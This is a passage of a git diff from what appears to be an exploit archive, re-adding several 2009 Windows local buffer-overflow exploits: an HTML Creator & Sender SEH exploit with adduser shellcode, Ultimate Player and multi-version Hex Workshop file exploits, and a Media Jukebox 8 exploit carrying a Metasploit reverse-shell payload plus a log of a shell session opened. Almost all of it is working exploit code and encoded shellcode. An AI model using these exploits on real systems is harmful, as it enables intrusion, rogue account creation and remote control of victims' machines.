created successfully" + +# milw0rm.com [2009-08-28] diff --git a/platforms/windows/local/9540.py b/platforms/windows/local/9540.py index 55438541c..29f1410d7 100755 --- a/platforms/windows/local/9540.py +++ b/platforms/windows/local/9540.py 
@@ -1,72 +1,72 @@ -#!/usr/bin/env python - -############################################################################# -# -# HTML Creator & Sender <= v2.3 Build 697 Local Buffer Overflow Exploit (SEH) -# Coded By: Dr_IDE -# Based On: http://www.milw0rm.com/exploits/9446 -# Testd On: Windows XP SP2 -# Download: http://www.html-email.net/ -# Usage: Browse to file, enter anything for From and To, Send Email. -# -############################################################################# - -import struct - -# windows/adduser USER=Dr_IDE PASS=Dr_IDE -# x86/alpha_upper succeeded with size 475 (iteration=1) -# badchars = "\x00\x0a\x0d\x20\xff" at least, Bind Shell was -# not working for me, there are still some unidentified bad chars. - -sc = ( -"\x89\xe1\xdb\xdf\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43" -"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41" -"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" -"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" -"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x51\x54\x43\x30\x43" -"\x30\x43\x30\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55" -"\x42\x58\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51" -"\x4f\x51\x30\x45\x51\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b" -"\x45\x51\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49" -"\x50\x42\x54\x44\x47\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52" -"\x4a\x4b\x4a\x54\x47\x4b\x50\x54\x46\x44\x44\x44\x44\x35\x4d" -"\x35\x4c\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x43\x56\x4c\x4b" -"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" -"\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4b\x39\x51\x4c\x51\x34" -"\x44\x44\x49\x53\x51\x4f\x46\x51\x4c\x36\x43\x50\x51\x46\x42" -"\x44\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b" -"\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4c\x49\x4a" -"\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58\x4a\x50\x4d\x5a" -"\x43\x34\x51\x4f\x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51" 
-"\x47\x4b\x4f\x4d\x37\x42\x43\x42\x4d\x43\x54\x46\x4e\x42\x45" -"\x43\x48\x43\x55\x47\x50\x46\x4f\x43\x53\x47\x50\x42\x4e\x43" -"\x55\x44\x34\x47\x50\x43\x45\x42\x53\x43\x55\x44\x32\x47\x50" -"\x50\x44\x42\x52\x51\x4f\x50\x49\x50\x44\x47\x35\x47\x50\x51" -"\x54\x44\x32\x51\x4f\x51\x59\x51\x54\x47\x35\x51\x30\x46\x4f" -"\x47\x31\x47\x34\x51\x54\x47\x50\x46\x46\x51\x36\x51\x30\x42" -"\x4e\x45\x35\x43\x44\x47\x50\x42\x4c\x42\x4f\x45\x33\x45\x31" -"\x42\x4c\x45\x37\x44\x32\x42\x4f\x43\x45\x44\x30\x51\x30\x51" -"\x51\x43\x54\x42\x4d\x43\x59\x42\x4e\x45\x39\x44\x33\x43\x44" -"\x43\x42\x45\x31\x43\x44\x42\x4f\x42\x52\x44\x33\x47\x50\x50" -"\x44\x44\x32\x51\x4f\x47\x39\x47\x34\x47\x35\x47\x50\x46\x4f" -"\x47\x31\x50\x44\x47\x34\x43\x30\x45\x5a\x41\x41") - -jump = ("\xEB\x06\x90\x90") -junk = ("\x43" * (4616 - len(sc))) -retn = ("\xFA\x89\xAB\x71") #WS2_32.DLL XPSP2 -nops = ("\x90" * 8) - -# Don't mess with the headers, we need to create a valid HTML file -header1 = ("\n\n\n\n\n\n\n") - -try: - f1 = open("Dr_IDE-Evil.html","w") - f1.write(header1 + payload + header2) - f1.close() - print("\nExploit file created!\n") -except: - print ("Error") - -# milw0rm.com [2009-08-28] +#!/usr/bin/env python + +############################################################################# +# +# HTML Creator & Sender <= v2.3 Build 697 Local Buffer Overflow Exploit (SEH) +# Coded By: Dr_IDE +# Based On: http://www.milw0rm.com/exploits/9446 +# Testd On: Windows XP SP2 +# Download: http://www.html-email.net/ +# Usage: Browse to file, enter anything for From and To, Send Email. +# +############################################################################# + +import struct + +# windows/adduser USER=Dr_IDE PASS=Dr_IDE +# x86/alpha_upper succeeded with size 475 (iteration=1) +# badchars = "\x00\x0a\x0d\x20\xff" at least, Bind Shell was +# not working for me, there are still some unidentified bad chars. 
+ +sc = ( +"\x89\xe1\xdb\xdf\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43" +"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41" +"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42" +"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50" +"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x51\x54\x43\x30\x43" +"\x30\x43\x30\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55" +"\x42\x58\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51" +"\x4f\x51\x30\x45\x51\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b" +"\x45\x51\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49" +"\x50\x42\x54\x44\x47\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52" +"\x4a\x4b\x4a\x54\x47\x4b\x50\x54\x46\x44\x44\x44\x44\x35\x4d" +"\x35\x4c\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x43\x56\x4c\x4b" +"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" +"\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b\x4b\x39\x51\x4c\x51\x34" +"\x44\x44\x49\x53\x51\x4f\x46\x51\x4c\x36\x43\x50\x51\x46\x42" +"\x44\x4c\x4b\x50\x46\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b" +"\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4c\x49\x4a" +"\x58\x4d\x53\x49\x50\x43\x5a\x50\x50\x43\x58\x4a\x50\x4d\x5a" +"\x43\x34\x51\x4f\x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51" +"\x47\x4b\x4f\x4d\x37\x42\x43\x42\x4d\x43\x54\x46\x4e\x42\x45" +"\x43\x48\x43\x55\x47\x50\x46\x4f\x43\x53\x47\x50\x42\x4e\x43" +"\x55\x44\x34\x47\x50\x43\x45\x42\x53\x43\x55\x44\x32\x47\x50" +"\x50\x44\x42\x52\x51\x4f\x50\x49\x50\x44\x47\x35\x47\x50\x51" +"\x54\x44\x32\x51\x4f\x51\x59\x51\x54\x47\x35\x51\x30\x46\x4f" +"\x47\x31\x47\x34\x51\x54\x47\x50\x46\x46\x51\x36\x51\x30\x42" +"\x4e\x45\x35\x43\x44\x47\x50\x42\x4c\x42\x4f\x45\x33\x45\x31" +"\x42\x4c\x45\x37\x44\x32\x42\x4f\x43\x45\x44\x30\x51\x30\x51" +"\x51\x43\x54\x42\x4d\x43\x59\x42\x4e\x45\x39\x44\x33\x43\x44" +"\x43\x42\x45\x31\x43\x44\x42\x4f\x42\x52\x44\x33\x47\x50\x50" +"\x44\x44\x32\x51\x4f\x47\x39\x47\x34\x47\x35\x47\x50\x46\x4f" +"\x47\x31\x50\x44\x47\x34\x43\x30\x45\x5a\x41\x41") + +jump = 
("\xEB\x06\x90\x90") +junk = ("\x43" * (4616 - len(sc))) +retn = ("\xFA\x89\xAB\x71") #WS2_32.DLL XPSP2 +nops = ("\x90" * 8) + +# Don't mess with the headers, we need to create a valid HTML file +header1 = ("\n\n\n\n\n\n\n") + +try: + f1 = open("Dr_IDE-Evil.html","w") + f1.write(header1 + payload + header2) + f1.close() + print("\nExploit file created!\n") +except: + print ("Error") + +# milw0rm.com [2009-08-28] diff --git a/platforms/windows/local/9548.pl b/platforms/windows/local/9548.pl index 2dc819004..097b8166e 100755 --- a/platforms/windows/local/9548.pl +++ b/platforms/windows/local/9548.pl 
@@ -1,39 +1,39 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH -#################################################################### -my $bof="\x41" x 4108; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.m3u'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-08-31] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH +#################################################################### +my $bof="\x41" x 4108; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xb8\x15\xd1\x72";##tasted under sp2//sp3 univ +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". 
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.m3u'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-08-31] diff --git a/platforms/windows/local/9550.txt b/platforms/windows/local/9550.txt index a6cb88503..71c97aac6 100755 --- a/platforms/windows/local/9550.txt +++ b/platforms/windows/local/9550.txt 
@@ -1,119 +1,119 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH) -# Found By: DATA_SNIPER -# http://www.bpsoft.com/downloads/ -###################################################################################### -##info:: i write 3 exploits for the 3 v -###################################################################################### -# USE>>file>>import>>hack4love.hex>> boom calc -###################################################################################### -# -#Hex Workshop v 3.11 -# -###################################################################################### -my $hed1=":0000FC..."; -my $hed2="\n:"; -my $bof="41" x 172; -my $nsh="EB069090"; -my $seh="62380012"; -my $nop="90" x 20; -my $sec= -"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; - -print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; -####################################################################################### -open(myfile,'>> HACK4LOVE.hex'); -print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; -###################################################################################### -###################################################################################### -###################################################################################### -###################################################################################### -# -#Hex Workshop V 4.00 // v 4.20 -# -###################################################################################### -my $hed1=":0000FC..."; -my $hed2="\n:"; -my $bof="41" x 172; -my $nsh="EB069090"; -my $seh="62380012"; -my $nop="90" x 20; -my $sec= 
-"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; - -print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; - -###################################################################################### -open(myfile,'>> HACK4LOVE.hex'); -print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; -###################################################################################### -###################################################################################### -###################################################################################### -# -#Hex Workshop V 4.21 // 4.22 // 4.23 -# -###################################################################################### -my $hed1=":0000FC..."; -my $hed2="\n:"; -my $bof="41" x 176; -my $nsh="EB069090"; -my $seh="8c29d374"; -my $nop="90" x 20; -my $sec= -"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; - -print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; - -###################################################################################### -open(myfile,'>> HACK4LOVwwE.hex'); -print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; -###################################################################################### -###################################################################################### -###################################################################################### -###################################################################################### -# -#Hex Workshop v 
5 -#v5.0 beta 1//v5.0.0.2511//v5.0.1.272//v5.0.2.2769//v5.1.1.3963/v5.1.3.4159/v5.1.4.4188 -# -###################################################################################### -my $hed1=":0000FC..."; -my $hed2="\n:"; -my $bof="41" x 172; -my $nsh="EB069090"; -my $seh="38f8d374"; -my $nop="90" x 20; -my $sec= -"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; - -print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; -####################################################################################### -open(myfile,'>> HACK4LOsssVE.hex'); -print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; -####################################################################################### -####################################################################################### -####################################################################################### -####################################################################################### -# -#Hex Workshop v6.0.0.4582 //v6.0.1.4603 -# -####################################################################################### -####################################################################################### -my $hed1=":0000FC..."; -my $hed2="\n:"; -my $bof="41" x 2228; -my $nsh="EB069090"; -my $seh="38f8d374"; -my $nop="90" x 20; -my $sec= -"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; - -print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; - 
-######################################################################################### -open(myfile,'>> HACK4LOVE.hex'); -print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; -####################################################################################### - -# milw0rm.com [2009-08-31] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# Hex Workshop v3//4//5//6 (.hex) Universal Local Buffer ExploitS (SEH) +# Found By: DATA_SNIPER +# http://www.bpsoft.com/downloads/ +###################################################################################### +##info:: i write 3 exploits for the 3 v +###################################################################################### +# USE>>file>>import>>hack4love.hex>> boom calc +###################################################################################### +# +#Hex Workshop v 3.11 +# +###################################################################################### +my $hed1=":0000FC..."; +my $hed2="\n:"; +my $bof="41" x 172; +my $nsh="EB069090"; +my $seh="62380012"; +my $nop="90" x 20; +my $sec= +"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; + +print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; +####################################################################################### +open(myfile,'>> HACK4LOVE.hex'); +print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; +###################################################################################### +###################################################################################### +###################################################################################### +###################################################################################### +# +#Hex 
Workshop V 4.00 // v 4.20 +# +###################################################################################### +my $hed1=":0000FC..."; +my $hed2="\n:"; +my $bof="41" x 172; +my $nsh="EB069090"; +my $seh="62380012"; +my $nop="90" x 20; +my $sec= +"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; + +print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; + +###################################################################################### +open(myfile,'>> HACK4LOVE.hex'); +print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; +###################################################################################### +###################################################################################### +###################################################################################### +# +#Hex Workshop V 4.21 // 4.22 // 4.23 +# +###################################################################################### +my $hed1=":0000FC..."; +my $hed2="\n:"; +my $bof="41" x 176; +my $nsh="EB069090"; +my $seh="8c29d374"; +my $nop="90" x 20; +my $sec= +"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; + +print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; + +###################################################################################### +open(myfile,'>> HACK4LOVwwE.hex'); +print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; +###################################################################################### 
+###################################################################################### +###################################################################################### +###################################################################################### +# +#Hex Workshop v 5 +#v5.0 beta 1//v5.0.0.2511//v5.0.1.272//v5.0.2.2769//v5.1.1.3963/v5.1.3.4159/v5.1.4.4188 +# +###################################################################################### +my $hed1=":0000FC..."; +my $hed2="\n:"; +my $bof="41" x 172; +my $nsh="EB069090"; +my $seh="38f8d374"; +my $nop="90" x 20; +my $sec= +"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; + +print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; +####################################################################################### +open(myfile,'>> HACK4LOsssVE.hex'); +print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; +####################################################################################### +####################################################################################### +####################################################################################### +####################################################################################### +# +#Hex Workshop v6.0.0.4582 //v6.0.1.4603 +# +####################################################################################### +####################################################################################### +my $hed1=":0000FC..."; +my $hed2="\n:"; +my $bof="41" x 2228; +my $nsh="EB069090"; +my $seh="38f8d374"; +my $nop="90" x 20; +my $sec= 
+"2bc983e9ded9eed97424f45b817313c2f8230283ebfce2f43e106702c2f8a847fe735f07baf9cc898de0a85de2f9c84b49cca8032cc9e39b6e7ce376c539e90fc33ac8f6f9ac0706b71da85de6f9c86449f468899de422e949e4a80329717f26c63b12c2a673633247385b0e49b82f89b2e48e89aaf0c80b49789302c2f8a86afea712f4a2aeaafa41385852aa08a9069d90bbfc48f674fd259b426ea1f82302"; + +print $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; + +######################################################################################### +open(myfile,'>> HACK4LOVE.hex'); +print myfile $hed1.$hed2.$bof.$nsh.$seh.$nop.$sec; +####################################################################################### + +# milw0rm.com [2009-08-31] diff --git a/platforms/windows/local/9551.py b/platforms/windows/local/9551.py index 7156dc6c2..19d560b94 100755 --- a/platforms/windows/local/9551.py +++ b/platforms/windows/local/9551.py 
@@ -1,102 +1,102 @@ -#!/usr/bin/python -# -# ###################################################################### -# -# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) -# Author: mr_me -# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html -# Note: we needed a header to trigger this one ;) -# Tested on: Wind0ws XP and Vist@ -# Greetz: offensive-security, I tried harder :) -# -# ###################################################################### -# -# msf exploit(handler) > exploit -# -# [*] Handler binding to LHOST 0.0.0.0 -# [*] Started reverse handler -# [*] Starting the payload handler... -# [*] Sending stage (474 bytes) -# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246) -# -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# C:\Program Files> -# - -def banner(): - print "\n|-------------------------------------------------------------|" - print "| Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) |" - print "| by MrMe 09/09 |" - print "|-------------------------------------------------------------|\n" - -# windows/shell/reverse_tcp - 617 bytes (stage 1) -# http://www.metasploit.com -# Encoder: x86/alpha_mixed -# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444 - -sc = ("\xda\xc8\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" -"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" -"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" -"\x4c\x4d\x38\x50\x56\x45\x50\x45\x50\x43\x30\x51\x43\x50\x55" -"\x46\x36\x50\x57\x4c\x4b\x42\x4c\x46\x44\x45\x48\x4c\x4b\x47" -"\x35\x47\x4c\x4c\x4b\x50\x54\x44\x45\x42\x58\x45\x51\x4b\x5a" -"\x4c\x4b\x51\x5a\x44\x58\x4c\x4b\x50\x5a\x47\x50\x43\x31\x4a" -"\x4b\x4b\x53\x46\x52\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31" -"\x4a\x4e\x46\x51\x4b\x4f\x4b\x4c\x50\x31\x49\x50\x4e\x4c\x46" -"\x58\x4d\x30\x42\x54\x44\x47\x49\x51\x48\x4f\x44\x4d\x43\x31" 
-"\x49\x57\x4a\x4b\x4c\x32\x47\x4b\x43\x4c\x46\x44\x45\x44\x42" -"\x55\x4b\x51\x4c\x4b\x51\x4a\x47\x54\x45\x51\x4a\x4b\x45\x36" -"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x5a\x45\x4c\x45\x51\x4a" -"\x4b\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4b\x58\x4a\x4b\x45\x52" -"\x50\x31\x49\x50\x51\x4f\x51\x4e\x51\x4d\x51\x4b\x49\x52\x44" -"\x48\x45\x50\x51\x4e\x43\x5a\x46\x50\x50\x59\x45\x34\x4c\x4b" -"\x45\x49\x4c\x4b\x51\x4b\x44\x4c\x4c\x4b\x51\x4b\x45\x4c\x4c" -"\x4b\x45\x4b\x4c\x4b\x51\x4b\x45\x58\x51\x43\x43\x58\x4c\x4e" -"\x50\x4e\x44\x4e\x4a\x4c\x4b\x4f\x48\x56\x4c\x49\x48\x47\x51" -"\x43\x45\x38\x51\x44\x49\x5a\x4e\x4f\x4c\x51\x4b\x4f\x49\x46" -"\x4b\x31\x4a\x4c\x43\x30\x45\x51\x45\x50\x43\x30\x50\x50\x51" -"\x47\x51\x46\x51\x43\x4b\x39\x4b\x55\x4a\x48\x45\x4f\x43\x30" -"\x45\x50\x43\x30\x4a\x30\x43\x31\x43\x30\x43\x30\x4e\x56\x42" -"\x39\x44\x58\x4b\x57\x4e\x44\x44\x59\x42\x50\x4b\x59\x4a\x4c" -"\x4c\x39\x4e\x4a\x45\x30\x4e\x39\x45\x59\x4b\x45\x4e\x4d\x48" -"\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x37\x50\x53\x50\x32\x51\x4f" -"\x46\x53\x46\x52\x43\x30\x51\x4b\x4c\x4d\x50\x4b\x42\x38\x46" -"\x31\x4b\x4f\x49\x47\x4c\x49\x49\x4f\x4c\x49\x49\x53\x4c\x4d" -"\x43\x45\x42\x34\x42\x4a\x45\x55\x50\x59\x50\x51\x46\x33\x4b" -"\x4f\x50\x34\x4c\x4f\x4b\x4f\x51\x45\x43\x34\x51\x49\x4d\x59" -"\x44\x44\x4c\x4e\x4b\x52\x4c\x32\x46\x4b\x51\x37\x46\x34\x4b" 